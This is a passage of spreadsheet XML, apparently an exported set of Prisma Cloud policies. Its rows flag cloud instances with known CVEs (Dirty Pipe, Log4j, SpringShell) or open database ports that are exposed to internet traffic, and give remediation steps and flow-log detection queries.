      <c r="AB3513" t="inlineStr">
        <is>
          <t>2023-07-20 17:55:09</t>
        </is>
      </c>
      <c r="AC3513" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-946</t>
        </is>
      </c>
      <c r="AD3513" t="b">
        <v>1</v>
      </c>
      <c r="AE3513" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3513" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG351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3" t="inlineStr">
        <is>
          <t>35efa226-8111-4a90-b809-3fe941dcf5fe</t>
        </is>
      </c>
      <c r="AI3513" t="inlineStr">
        <is>
          <t>5cc5ab30-cad5-425e-8e32-85c1cc6033cf</t>
        </is>
      </c>
      <c r="AJ3513" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3513" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3514">
      <c r="A3514" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B3514" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3514" s="2" t="inlineStr"/>
      <c r="D3514" t="inlineStr"/>
      <c r="E3514" t="inlineStr"/>
      <c r="F3514" t="inlineStr"/>
      <c r="G3514" t="b">
        <v>1</v>
      </c>
      <c r="H351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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3514" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3514" t="inlineStr">
        <is>
          <t>Instance affected by Dirty Pipe vulnerability is exposed to network traffic from the internet [CVE-2022-0847]</t>
        </is>
      </c>
      <c r="L3514" t="inlineStr"/>
      <c r="M3514" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3514" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3514" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3514" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3514" t="inlineStr">
        <is>
          <t>4.1 Network</t>
        </is>
      </c>
      <c r="R3514" t="inlineStr">
        <is>
          <t>4.1.1 Network - All</t>
        </is>
      </c>
      <c r="S3514" t="inlineStr"/>
      <c r="T3514" t="b">
        <v>0</v>
      </c>
      <c r="U3514" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3514" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3514" t="inlineStr">
        <is>
          <t>This policy identifies Instances installed with Dirty Pipe version vulnerable for CVE-2022-0847 and exposed to network traffic from the internet. It is recommended to upgrade the Dirty Pipe Linux kernel version to the latest version and limit exposure to the internet.
For details:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0847
NOTE: This policy is effective only when Prisma Compute is enabled in your environment.</t>
        </is>
      </c>
      <c r="X3514"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Dirty Pipe Linux kernel related services then terminate the services and change the ACL to block the outgoing traffic.
5. If this instance is authorized to use Dirty Pipe Linux kernel related services then upgrade Dirty Pipe Linux kernel to the latest version to fix this vulnerability.</t>
        </is>
      </c>
      <c r="Y3514" t="inlineStr"/>
      <c r="Z3514" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where bytes &gt; 0 AND dest.resource IN (resource where finding.type IN ('Host Vulnerability') AND finding.source IN ('Prisma Cloud') AND finding.name IN ('CVE-2022-0847')) AND source.publicnetwork IN ('Internet IPs', 'Suspicious IPs')</t>
        </is>
      </c>
      <c r="AA3514" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3514" t="inlineStr">
        <is>
          <t>2023-07-20 18:10:21</t>
        </is>
      </c>
      <c r="AC3514" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-947</t>
        </is>
      </c>
      <c r="AD3514" t="b">
        <v>1</v>
      </c>
      <c r="AE3514" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3514" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG351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4" t="inlineStr">
        <is>
          <t>b8f7d52a-73e8-43db-9977-ed17967006f0</t>
        </is>
      </c>
      <c r="AI3514" t="inlineStr">
        <is>
          <t>9dccbfde-41a3-4ee3-a759-a1c0751077f4</t>
        </is>
      </c>
      <c r="AJ3514" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3514" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3515">
      <c r="A3515" t="inlineStr">
        <is>
          <t>CSA CCM v3.0.1, HITRUST CSF v9.3 [Deprecated], GDPR, PCI DSS v3.2.1, NIST 800-53 Rev 5, NIST CSF, NIST CSF v2.0, NIST CSF, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], MITRE ATT&amp;CK v8.2 [Deprecated], GDPR, jbrox - GDPR, HITRUST CSF v9.3 [Deprecated], MITRE ATT&amp;CK v10.0 [Deprecated], HITRUST CSF v9.3 [Deprecated], MITRE ATT&amp;CK v12, CSA CCM v3.0.1, SOC 2, CDC NIST 800-53 Rev4, NIST 800-53 Rev4, PCI DSS v3.2.1, NIST 800-53 Rev4, Matt's ATT&amp;ACK, NIST SP 800-171 Revision 3, CDC NIST 800-53 Rev4, PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH, NIST CSF, NIST CSF, MITRE ATT&amp;CK v6.3 [Deprecated], SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, jbrox - GDPR, NIST 800-53 Rev4, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], CDC NIST 800-53 Rev4, CSA CCM v3.0.1, NIST CSF, CSA CCM v3.0.1, CCPA 2018, PIPEDA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NIST CSF, CSA CCM v3.0.1</t>
        </is>
      </c>
      <c r="B3515" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C3515" s="2" t="inlineStr"/>
      <c r="D3515" t="n">
        <v>0</v>
      </c>
      <c r="E3515" t="n">
        <v>28</v>
      </c>
      <c r="F3515" t="n">
        <v>75</v>
      </c>
      <c r="G3515" t="b">
        <v>1</v>
      </c>
      <c r="H351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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3515" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3515" t="inlineStr">
        <is>
          <t>Instances exposed to network traffic from the internet</t>
        </is>
      </c>
      <c r="L3515" t="inlineStr"/>
      <c r="M3515" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3515" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3515" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3515" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3515" t="inlineStr">
        <is>
          <t>SC-1</t>
        </is>
      </c>
      <c r="R3515" t="inlineStr">
        <is>
          <t>SC-7b</t>
        </is>
      </c>
      <c r="S3515" t="inlineStr">
        <is>
          <t>Prisma_Cloud,Policy Status Review</t>
        </is>
      </c>
      <c r="T3515" t="b">
        <v>0</v>
      </c>
      <c r="U3515" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3515" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3515" t="inlineStr">
        <is>
          <t>This policy identifies network traffic coming from the internet to sensitive cloud workloads. Cloud workloads should have appropriate Security Groups and ACLs in place so that only external facing workloads such as load balancers, web servers, bastion hosts are exposed to the internet. Cloud workloads with internet exposure are vulnerable to external threats.
Note: This policy alerts AWS and GCP workloads correctly and for Azure, it may trigger alerts for NAT Gateway configured resources also.</t>
        </is>
      </c>
      <c r="X3515" t="inlineStr">
        <is>
          <t>1. Log in to the Cloud Console
2. Search for the resource reported in the alert
3. Check if the Security Group/Firewall Rule of the resource indeed allows connections from the internet
4. Assign another Security Group/Firewall Rule to the resource that has a more restrictive ACL, which does not permit connection from the internet</t>
        </is>
      </c>
      <c r="Y3515" t="inlineStr"/>
      <c r="Z3515" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where src.publicnetwork IN ('Suspicious IPs','Internet IPs') AND dest.resource IN ( resource where role not in ( 'AWS NAT Gateway' , 'AWS ELB', 'AZURE ELB', 'GCP ELB' ) ) and protocol not in ( 'ICMP' , 'ICMP6' ) AND accepted.bytes &gt; 0</t>
        </is>
      </c>
      <c r="AA3515" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3515" t="inlineStr">
        <is>
          <t>2023-07-20 18:01:18</t>
        </is>
      </c>
      <c r="AC3515" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-36</t>
        </is>
      </c>
      <c r="AD3515" t="b">
        <v>1</v>
      </c>
      <c r="AE3515" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3515" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG351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5" t="inlineStr">
        <is>
          <t>9c7af8a8-5743-420f-a879-8f0f73d678ea</t>
        </is>
      </c>
      <c r="AI3515" t="inlineStr">
        <is>
          <t>b13f6181-3cd7-4c97-9420-29498cb28277</t>
        </is>
      </c>
      <c r="AJ3515" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3515" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3516">
      <c r="A3516" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], CCPA 2018, PIPEDA</t>
        </is>
      </c>
      <c r="B3516" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3516" s="2" t="inlineStr"/>
      <c r="D3516" t="inlineStr"/>
      <c r="E3516" t="inlineStr"/>
      <c r="F3516" t="inlineStr"/>
      <c r="G3516" t="b">
        <v>1</v>
      </c>
      <c r="H351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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3516" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3516" t="inlineStr">
        <is>
          <t>DB ports exposed to network traffic from the internet</t>
        </is>
      </c>
      <c r="L3516" t="inlineStr"/>
      <c r="M3516" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3516" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3516" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3516" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3516" t="inlineStr">
        <is>
          <t>4.7</t>
        </is>
      </c>
      <c r="R3516" t="inlineStr">
        <is>
          <t>4.7.3</t>
        </is>
      </c>
      <c r="S3516" t="inlineStr"/>
      <c r="T3516" t="b">
        <v>0</v>
      </c>
      <c r="U3516" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3516" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3516" t="inlineStr">
        <is>
          <t>This policy identifies network traffic coming from the internet to sensitive DB Servers. DB Servers contain sensitive data and should not be exposed to any direct traffic from the internet. The DB servers monitored on the default ports are : Microsoft SQL Server (1433), Oracle (1521), MySQL (3306), Sybase (5000), Postgresql (5432), CouchDB (5984), Redis (6379, 6380), RethinkDB (8080,28015, 29015), CassandraDB (9042), Memcached (11211), MongoDB (27017), DB2 (50000).
Note: This policy alerts AWS and GCP workloads correctly and for Azure, it may trigger alerts for NAT Gateway configured resources also.</t>
        </is>
      </c>
      <c r="X3516" t="inlineStr">
        <is>
          <t>Use the firewall/Security group rules to specify which IP address ranges from the Internet are allowed to access Databases. Ensure that all known DB ports are restricted to the public access.
For AWS accounts:
In the AWS console, identify the 'Security Group' associated with the reported DB Server. Modify the inbound security rules to restrict all traffic to DB ports.
For Azure accounts:
In the Azure portal, identify the 'Network Security Group' associated with the reported DB Server. Modify the inbound security rules to restrict all traffic to DB ports.
For GCP accounts:
In the GCP console, identify the 'VPC Firewall rules' associated with the reported DB Server. Modify the inbound security rules to restrict all traffic to DB ports.</t>
        </is>
      </c>
      <c r="Y3516" t="inlineStr"/>
      <c r="Z3516" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where src.publicnetwork in ('Suspicious IPs','Internet IPs') and dest.port in (1433, 1521, 3306, 5000, 5432, 5984, 6379, 6380, 8080, 9042, 11211, 27017, 28015, 29015, 50000) AND dest.resource IN ( resource where role not in ( 'AWS ELB', 'AWS NAT Gateway', 'AZURE ELB', 'GCP ELB' )) AND accepted.bytes &gt; 0</t>
        </is>
      </c>
      <c r="AA3516" t="inlineStr">
        <is>
          <t>Jonathan Brox</t>
        </is>
      </c>
      <c r="AB3516" t="inlineStr">
        <is>
          <t>2023-06-20 21:41:24</t>
        </is>
      </c>
      <c r="AC3516" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-142</t>
        </is>
      </c>
      <c r="AD3516" t="b">
        <v>1</v>
      </c>
      <c r="AE3516" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3516" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG351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6" t="inlineStr">
        <is>
          <t>0408a03f-095f-4adc-8991-3b9e324a5e47</t>
        </is>
      </c>
      <c r="AI3516" t="inlineStr">
        <is>
          <t>25d0c0d7-03c1-4be2-9439-85249c4a9c23</t>
        </is>
      </c>
      <c r="AJ3516" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3516" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3517">
      <c r="A3517" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B3517" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3517" s="2" t="inlineStr"/>
      <c r="D3517" t="inlineStr"/>
      <c r="E3517" t="inlineStr"/>
      <c r="F3517" t="inlineStr"/>
      <c r="G3517" t="b">
        <v>1</v>
      </c>
      <c r="H351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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3517" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3517" t="inlineStr">
        <is>
          <t>Instance affected by Apache Log4j denial of service vulnerability is exposed to network traffic from the internet [CVE-2021-45105]</t>
        </is>
      </c>
      <c r="L3517" t="inlineStr"/>
      <c r="M3517" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3517" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3517" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3517" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3517" t="inlineStr">
        <is>
          <t>4.1 Network</t>
        </is>
      </c>
      <c r="R3517" t="inlineStr">
        <is>
          <t>4.1.1 Network - All</t>
        </is>
      </c>
      <c r="S3517" t="inlineStr"/>
      <c r="T3517" t="b">
        <v>0</v>
      </c>
      <c r="U3517" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3517" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3517" t="inlineStr">
        <is>
          <t>This policy identifies Instances installed with Apache Log4j version vulnerable for CVE-2021-45105 and exposed to network traffic from the internet. It is recommended to upgrade the Apache Log4j version to the latest version and limit exposure to the internet.
For details:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-45105
NOTE: This policy is effective only when Prisma Compute is enabled in your environment.</t>
        </is>
      </c>
      <c r="X3517"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Apache Log4j related services then terminate the services and change the ACL to block the outgoing traffic.
5. If this instance is authorized to use Apache Log4j related services then upgrade Apache Log4j to the latest version to fix this vulnerability.</t>
        </is>
      </c>
      <c r="Y3517" t="inlineStr"/>
      <c r="Z3517" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where bytes &gt; 0 AND dest.resource IN (resource where finding.type IN ('Host Vulnerability') AND finding.source IN ('Prisma Cloud') AND finding.name IN ('CVE-2021-45105')) AND source.publicnetwork IN ('Internet IPs', 'Suspicious IPs')</t>
        </is>
      </c>
      <c r="AA3517" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3517" t="inlineStr">
        <is>
          <t>2023-07-20 18:00:16</t>
        </is>
      </c>
      <c r="AC3517" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-954</t>
        </is>
      </c>
      <c r="AD3517" t="b">
        <v>1</v>
      </c>
      <c r="AE3517" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3517" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG351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7" t="inlineStr">
        <is>
          <t>ead2d2c8-965b-439e-b62d-5f991dff22e0</t>
        </is>
      </c>
      <c r="AI3517" t="inlineStr">
        <is>
          <t>cafc8dc9-9665-4b63-9460-2c7713f4f4d4</t>
        </is>
      </c>
      <c r="AJ3517" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3517" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3518">
      <c r="A3518" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B3518" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3518" s="2" t="inlineStr"/>
      <c r="D3518" t="inlineStr"/>
      <c r="E3518" t="inlineStr"/>
      <c r="F3518" t="inlineStr"/>
      <c r="G3518" t="b">
        <v>0</v>
      </c>
      <c r="H351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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3518" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3518" t="inlineStr">
        <is>
          <t>Instance affected by Spring Framework SpringShell vulnerability is exposed to network traffic from the internet [CVE-2022-22965]</t>
        </is>
      </c>
      <c r="L3518" t="inlineStr"/>
      <c r="M3518" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3518" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3518" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3518" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3518" t="inlineStr">
        <is>
          <t>4.1 Network</t>
        </is>
      </c>
      <c r="R3518" t="inlineStr">
        <is>
          <t>4.1.1 Network - All</t>
        </is>
      </c>
      <c r="S3518" t="inlineStr"/>
      <c r="T3518" t="b">
        <v>0</v>
      </c>
      <c r="U3518" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3518" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3518" t="inlineStr">
        <is>
          <t>This policy identifies Instances installed with the Java Spring Framework version vulnerable to arbitrary code execution [CVE-2022-22965] and exposed to network traffic from the internet. It is recommended to upgrade the Java Spring Framework version to the latest version and limit exposure to the internet.
For details refer:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965
NOTE: This policy is effective only when Prisma Compute is enabled in your environment.</t>
        </is>
      </c>
      <c r="X3518"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Java Spring Framework related services then terminate the services and change the ACL to block the outgoing traffic.
5. If this instance is authorized to use Java Spring Framework related services then upgrade Java Spring Framework to the latest version to fix this vulnerability.</t>
        </is>
      </c>
      <c r="Y3518" t="inlineStr"/>
      <c r="Z3518" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where bytes &gt; 0 AND dest.resource IN (resource where finding.type IN ( 'Host Vulnerability' ) AND finding.source IN ( 'Prisma Cloud' ) AND finding.name IN ('CVE-2022-22965')) AND source.publicnetwork IN ('Internet IPs', 'Suspicious IPs')</t>
        </is>
      </c>
      <c r="AA3518" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB3518" t="inlineStr">
        <is>
          <t>2024-11-13 23:46:06</t>
        </is>
      </c>
      <c r="AC3518" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-868</t>
        </is>
      </c>
      <c r="AD3518" t="b">
        <v>1</v>
      </c>
      <c r="AE3518" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3518" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG351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8" t="inlineStr">
        <is>
          <t>116a3268-9456-4dfb-ae2b-0f630bf3f5ea</t>
        </is>
      </c>
      <c r="AI3518" t="inlineStr">
        <is>
          <t>a51ac66e-b390-420a-a87d-8aee1b000e64</t>
        </is>
      </c>
      <c r="AJ3518" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3518" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3519">
      <c r="A3519" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B3519" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3519" s="2" t="inlineStr"/>
      <c r="D3519" t="inlineStr"/>
      <c r="E3519" t="inlineStr"/>
      <c r="F3519" t="inlineStr"/>
      <c r="G3519" t="b">
        <v>0</v>
      </c>
      <c r="H3519"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19" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3519" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3519" t="inlineStr">
        <is>
          <t>Instance affected by Apache Log4j Thread Context Map remote code execution vulnerability is exposed to network traffic from the internet [CVE-2021-45046]</t>
        </is>
      </c>
      <c r="L3519" t="inlineStr"/>
      <c r="M3519" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3519" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3519" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3519" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3519" t="inlineStr">
        <is>
          <t>4.1 Network</t>
        </is>
      </c>
      <c r="R3519" t="inlineStr">
        <is>
          <t>4.1.1 Network - All</t>
        </is>
      </c>
      <c r="S3519" t="inlineStr"/>
      <c r="T3519" t="b">
        <v>0</v>
      </c>
      <c r="U3519" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3519" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3519" t="inlineStr">
        <is>
          <t>This policy identifies Instances installed with Apache Log4j Thread Context Map version vulnerable for CVE-2021-45046 and exposed to network traffic from the internet. It is recommended to upgrade the Apache Log4j Thread Context Map version to the latest version and limit exposure to the internet.
For details:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-45046
NOTE: This policy is effective only when Prisma Compute is enabled in your environment.</t>
        </is>
      </c>
      <c r="X3519"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Apache Log4j Thread Context Map related services then terminate the services and change the ACL to block the outgoing traffic.
5. If this instance is authorized to use Apache Log4j Thread Context Map related services then upgrade Apache Log4j Thread Context Map to the latest version to fix this vulnerability.</t>
        </is>
      </c>
      <c r="Y3519" t="inlineStr"/>
      <c r="Z3519" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where bytes &gt; 0 AND dest.resource IN (resource where finding.type IN ('Host Vulnerability') AND finding.source IN ('Prisma Cloud') AND finding.name IN ('CVE-2021-45046')) AND source.publicnetwork IN ('Internet IPs', 'Suspicious IPs')</t>
        </is>
      </c>
      <c r="AA3519" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB3519" t="inlineStr">
        <is>
          <t>2024-11-13 23:46:05</t>
        </is>
      </c>
      <c r="AC3519" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-953</t>
        </is>
      </c>
      <c r="AD3519" t="b">
        <v>1</v>
      </c>
      <c r="AE3519" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3519" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG3519"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19" t="inlineStr">
        <is>
          <t>45f413e6-8ec9-4c2c-a760-5509b20c86af</t>
        </is>
      </c>
      <c r="AI3519" t="inlineStr">
        <is>
          <t>206727c6-9522-41d2-ae8d-b8351318151e</t>
        </is>
      </c>
      <c r="AJ3519" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3519" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3520">
      <c r="A3520" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B3520" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3520" s="2" t="inlineStr"/>
      <c r="D3520" t="inlineStr"/>
      <c r="E3520" t="inlineStr"/>
      <c r="F3520" t="inlineStr"/>
      <c r="G3520" t="b">
        <v>1</v>
      </c>
      <c r="H3520"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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3520" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3520" t="inlineStr">
        <is>
          <t>Instance affected by Apache Log4j JDBC Appender remote code execution vulnerability is exposed to network traffic from the internet [CVE-2021-44832]</t>
        </is>
      </c>
      <c r="L3520" t="inlineStr"/>
      <c r="M3520" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3520" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3520" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3520" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3520" t="inlineStr">
        <is>
          <t>4.1 Network</t>
        </is>
      </c>
      <c r="R3520" t="inlineStr">
        <is>
          <t>4.1.1 Network - All</t>
        </is>
      </c>
      <c r="S3520" t="inlineStr"/>
      <c r="T3520" t="b">
        <v>0</v>
      </c>
      <c r="U3520" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3520" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3520" t="inlineStr">
        <is>
          <t>This policy identifies Instances installed with Apache Log4j JDBC Appender version vulnerable for CVE-2021-44832 and exposed to network traffic from the internet. It is recommended to upgrade the Apache Log4j JDBC Appender version to the latest version and limit exposure to the internet.
For details:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44832
NOTE: This policy is effective only when Prisma Compute is enabled in your environment.</t>
        </is>
      </c>
      <c r="X3520"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Apache Log4j JDBC Appender related services then terminate the services and change the ACL to block the outgoing traffic.
5. If this instance is authorized to use Apache Log4j JDBC Appender related services then upgrade Apache Log4j JDBC Appender to the latest version to fix this vulnerability.</t>
        </is>
      </c>
      <c r="Y3520" t="inlineStr"/>
      <c r="Z3520" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where bytes &gt; 0 AND dest.resource IN (resource where finding.type IN ('Host Vulnerability') AND finding.source IN ('Prisma Cloud') AND finding.name IN ('CVE-2021-44832')) AND source.publicnetwork IN ('Internet IPs', 'Suspicious IPs')</t>
        </is>
      </c>
      <c r="AA3520" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3520" t="inlineStr">
        <is>
          <t>2023-07-20 18:00:41</t>
        </is>
      </c>
      <c r="AC3520" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-952</t>
        </is>
      </c>
      <c r="AD3520" t="b">
        <v>1</v>
      </c>
      <c r="AE3520" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3520" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG3520"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0" t="inlineStr">
        <is>
          <t>d6922dc8-1aee-4b1e-b46e-ee52693d3243</t>
        </is>
      </c>
      <c r="AI3520" t="inlineStr">
        <is>
          <t>d8e43c13-35a5-43a6-882c-87a46fb6b7f7</t>
        </is>
      </c>
      <c r="AJ3520" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3520" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3521">
      <c r="A3521" t="inlineStr">
        <is>
